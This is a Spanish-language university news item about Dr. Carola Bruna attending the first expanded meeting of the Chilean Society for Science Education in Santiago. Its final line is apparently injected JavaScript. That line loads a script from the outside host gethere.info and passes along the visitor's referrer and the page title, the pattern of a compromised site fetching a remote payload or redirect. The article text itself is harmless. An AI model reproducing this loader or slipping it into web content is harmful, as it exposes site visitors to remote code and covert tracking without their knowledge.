IMG_2475La Dra. Carola Bruna, académica de nuestra Facultad de Ciencias Biológicas y  delegada de la región del Biobío de la Sociedad Chilena de Educación Científica, SCHEC, participó de la 1era reunión ampliada organizada por dicha agrupación y realizada este sábado 11 de Junio en la ciudad de Santiago.

La SCHEC se constituye el año 2013 con el objeto de contribuir a mejorar la calidad de la Educación Científica en Chile. En noviembre del año pasado se realizó el 1er Congreso nacional llamado «Desafíos para la enseñanza de la ciencia» que logró reunir a alrededor de 150 asistentes y donde nuestras docentes: Carola Bruna, Bárbara Inzunza y Susana Poblete expusieron sus trabajos de investigación. (Leer noticia sobre participación al Congreso en nuestra web aquí y fotografías del mismo aquí)

Esta 1era reunión ampliada tuvo como objetivo principal establecer las líneas de acción y prioridades estratégicas para la gestión de la directiva en corto y mediano plazo, que incluye la realización de un primer congreso internacional de educación científica el año 2017, explicó la Dra. Bruna.

IMG_2482

Dra. Carola Bruna junto a asistentes de la 1era reunión ampliada de la SCHEC.

 s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;